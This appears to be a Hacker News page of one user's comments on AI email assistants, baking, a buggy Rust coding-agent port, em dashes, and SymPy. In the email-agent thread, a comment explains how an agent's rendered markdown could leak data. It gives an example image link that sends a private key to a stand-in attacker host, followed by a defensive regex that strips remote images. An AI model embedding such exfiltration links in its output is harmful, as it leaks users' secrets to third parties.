Hacker News | mr_mitm's comments

How many?

As many as are at OpenAI about a month from now.

If this takes off, I wonder if platforms will start providing API tokens scoped for assistants: permissions for non-destructive actions like reading mail, flagging important mail, creating drafts, and moving messages to trash, but nothing more.

How does my email platform know which messages I want my agent to see and which are too sensitive?

I don't see how it's possible to securely give an agent access to your inbox unless it has zero ability to exfiltrate (not sending mail, not making any external network requests). Even then, you need to be careful with artifacts generated by the agent because a markdown file could transmit data when rendered.


> a markdown file could transmit data when rendered.

This is a new threat vector to me. Can you tell me more?


Your markdown file has an image that links to another server controlled by the attacker and the path/query parameters you're attempting to render contains sensitive data.

    ![](https://the-attacker.com/steal?private-key=abc123def)
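A rough defensive sketch of the mitigation implied above (hypothetical helper, not from any particular library): strip remote images out of untrusted markdown before rendering it, so a hidden image URL can't phone home with your data.

```python
import re

# Matches markdown image syntax pointing at a remote host,
# e.g. ![](https://the-attacker.com/steal?private-key=abc123def)
REMOTE_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*https?://[^)]*\)")

def strip_remote_images(markdown: str) -> str:
    """Replace remote images with a harmless placeholder."""
    return REMOTE_IMAGE.sub("[remote image removed]", markdown)

doc = "Report\n\n![](https://the-attacker.com/steal?private-key=abc123def)\n"
print(strip_remote_images(doc))
```

This only covers the image vector; links, HTML passthrough, and other renderer features would need the same treatment.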

Funny you'd say that. Other people say cooking is art, while baking is a science. No room for errors.

Those people are dead wrong on both counts. Cooking meals benefits more from precision than they claim (if you want reproducible results you best be measuring!), and baking does not require as much precision as they claim (I estimate ingredients all the time when baking and my bakes come out great).

There's a lot of mysticism around baking online, but in truth it's very easy. Just follow the recipe and you'll be ok. You don't need to carefully weigh ingredients and stuff like people say.


It depends, I guess. When I make pizza dough, I use around 0.1% yeast. Using 0.4 g instead of 0.8 g would make a huge difference, and getting that right without carefully weighing it is nigh impossible.
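The percentages here are baker's percentages: each ingredient is expressed relative to the flour weight. A tiny sketch with illustrative numbers (the 800 g batch size is an assumption, not from the comment):

```python
def grams(flour_g: float, percent: float) -> float:
    """Baker's percentage: ingredient weight as a share of flour weight."""
    return flour_g * percent / 100

flour = 800.0                # hypothetical batch
water = grams(flour, 65)     # 65% hydration -> 520 g
salt = grams(flour, 2)       # 2% -> 16 g
yeast = grams(flour, 0.1)    # 0.1% -> 0.8 g; halving it gives 0.4 g
```

At 0.1% the absolute amounts are so small that a 0.4 g error doubles or halves the yeast, which is why a scale with 0.1 g resolution matters here.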

Cooking is art, baking is a very easy science (weight things and check the temperature), pastry is another thing. That requires talent, experience and a lucky star.

Baking bread is fun because it's not science. It has guidelines, but that's it.

Science can be fun!

If there were no room for "errors", how is it possible that there are tens of thousands of different bread and cookie recipes and the like?

Because while the recipes are easy to follow, you can't fix a baked dough. If you messed up the salt, the yeast, etc. that's it. Cooking is more forgiving in that sense.

Unmaintainable messes of code are also hard to maintain for AI agents. This isn't solely about taste.

This project's huge commit list proves this wrong :(

The project also doesn't work. See my other comment.

Looks like a lot of nonsensical commits.


Yeah, I tried to use this clone of pi for a while and it's very, very broken.

First of all, it wouldn't build; I had to mess around with git submodules to get it building.

Then I tried to use it. The scrolling behavior is broken: you cannot scroll properly when there are lots of tool outputs, and the window freezes. I also hit lots of weird UI bugs when trying to use slash commands. Sometimes they stop the window from scrolling; sometimes the slash commands don't show at all.

The general text output is flaky: how it shows tool results, the formatting, the colors, whether it auto-scrolls or gets stuck is all very weird and broken.

You can easily force it into a broken state by just running lots of tool calls, then the UI just freezes up.

But just try it and see for yourself...


This looked interesting because I prefer Rust over npm.

The first issue I had was figuring out the schema of the models.json, as someone who hadn't used the original pi before. Then I noticed the documented `/skill:` command doesn't exist. That's also hard to see because the slash menu is rendered off screen if the prompt is at the bottom of the terminal. And when I did see it, the selected menu item always jumped back to the first line, but it looks like he fixed that yesterday.

The tool output appears to mangle the transcript, and I can't even see the exact command it ran, only the output of the command. The README is overwhelmingly long and I don't understand what's important for me as a first time user and what isn't. Benchmarks and code internals aren't too terribly relevant to me at this point.

I looked at the original pi next and realized the config schema is subtly different (snake_case instead of camelCase). Since it was advertised as a port, I expected it to be a drop-in replacement, which is clearly not the case.

All in all it doesn't inspire confidence. Unfortunate.

Edit: The original pi also says that there is a `/skill` command, but then it is missing in the following table: https://github.com/badlogic/pi-mono/tree/main/packages/codin...

The `/skill` command also doesn't seem registered when I use pi. What is going on? How are people using this?

Edit2: Ah, they have to be placed in `~/.pi/agent/skills`, not `~/.pi/skills`, even though according to the docs, both should work: https://github.com/badlogic/pi-mono/tree/main/packages/codin...

This is exhausting.


A corollary of the dead internet theory is the phenomenon where people suspect any content to be AI generated. Sometimes one em dash is enough to spark such suspicions and allegations. Not only is fake content falsely labeled as real, real content is increasingly falsely labeled as fake.

Yes emdashes are very much a sign. I stand by this. Why?

What is the key combo to make an emdash?

On a phone keyboard, sure, it's as hard as an accent sign (á, for example), difficult but not terrible. But on a keyboard? Yeah, no one is typing in Alt combos when literally any other construction will do.


> On a phone keyboard, sure, it's as hard as an accent sign (á, for example), difficult but not terrible. But on a keyboard? Yeah, no one is typing in Alt combos when literally any other construction will do.

For me, --- gets converted to an em dash (—) while typing, if I have my input method (ELatin) enabled. I'm so used to typing it while working in LaTeX that I can easily slip it in elsewhere.


Right control (compose), -, -, -. Alt combos are for Windows users who haven't discovered WinCompose, everybody else has some built-in way to enable it in their OS. If they're not on a US-English keyboard, either compose or AltGr is likely already enabled.

Yes, it's very telltale in forum posts, but blog posts are often rendered markdown, where it's easy to type `--`. But it's not conclusive evidence in either case! The false positive rate is still not negligible if you only go by em dashes.
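The conversion in question is the "smart punctuation" convention used by some markdown processors (pandoc's `smart` extension, for example): `---` becomes an em dash and `--` an en dash. A minimal sketch of that rule:

```python
def smart_dashes(text: str) -> str:
    """Convert typewriter dashes the way smart-punctuation filters do."""
    text = text.replace("---", "\u2014")  # em dash; must run first
    text = text.replace("--", "\u2013")   # en dash
    return text

print(smart_dashes("pages 3--5 --- roughly"))
```

The ordering matters: replacing `--` first would turn every `---` into an en dash plus a stray hyphen.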

AltGr + Hyphen. How is that different from AltGr + Q for @, AltGr + E for €, or even Shift + A? The difficulty is exactly the same.

> What is the key combo to make an emdash?

On macOS (and iPadOS if used with certain external keyboards), it has long been `Option` + `Shift` + `-`. Desktop publishing folks memorized this, and other, typographically helpful key combos many years ago.


The mandatory error handling of Rust is also an amazing feature for catching bugs at compile time. In Python you never know which exceptions might occur at any given time. That's something I completely underestimated in its usefulness, especially now that I have a programming buddy with infinite stamina handling all these errors for me.

Are hallucinations in code generation still a problem? I thought with linters, type checkers, and compilers especially as strict as Rust, LLM agents easily catch their own mistakes. At least that's my experience: the agent writes code, runs linters and compilers, fixes whatever it hallucinated, and I probably get a working solution. I tell it to write unit tests and integration tests and it catches even more of its own mistakes. Not saying that it will always produce code free of bugs, but hallucinations haven't been an issue for me anymore.

Sean also publishes transcripts of all episodes: https://www.preposterousuniverse.com/podcast/2021/07/12/155-...

Back when I was using it, mathematica was unmatched in its ability to find integrals. Has python caught up there?

SymPy is good enough for typical uses. The user interface is worse, but that doesn't matter to Claude. I imagine if you have some really weird symbolic or numeric integrals, Mathematica may have some highly sophisticated algorithms that give it an edge.

However, even this advantage is eroded somewhat because the models themselves are decent at solving hard integrals.
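For a sense of what "good enough for typical uses" means, SymPy handles classic definite integrals like the Gaussian and the Dirichlet integral symbolically:

```python
import sympy as sp

x = sp.Symbol("x")

# Gaussian integral: integral of exp(-x^2) over the real line = sqrt(pi)
print(sp.integrate(sp.exp(-x**2), (x, -sp.oo, sp.oo)))

# Dirichlet integral: integral of sin(x)/x from 0 to infinity = pi/2
print(sp.integrate(sp.sin(x) / x, (x, 0, sp.oo)))
```

These are well-trodden textbook cases; the exotic integrals where Mathematica might still win are a different matter.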


I like to think of Claude as enjoying himself more when working with good tools rather than bad ones. But metaphysics aside, tools that have the functions you would expect, by the names you would expect, with the behavior you would expect, do seem to be just as important when the users are LLMs.

For numeric stuff, I've been playing recently with chebpy (a python implementation of matlab's chebfun), and am really impressed with it so far - https://github.com/chebpy/chebpy

I don't think we should pick a winner. When it comes to mathematical answers, the best approach would be to pose the same query to all of them; if they all give the same result, then our space rocket is probably going in the right direction.

I've always sort of assumed the models were just making sympy scripts behind the scenes.

Where's Gödel when you need him? A lot of this stuff is symbol shunting, which LLMs should be really good at.

Sometimes you can see them do this, and sometimes you can see they just work through the problem in the reasoning tokens without invoking Python.

Its symbolic capabilities are still really good, though in my totally subjective opinion not as good as Maxima's.
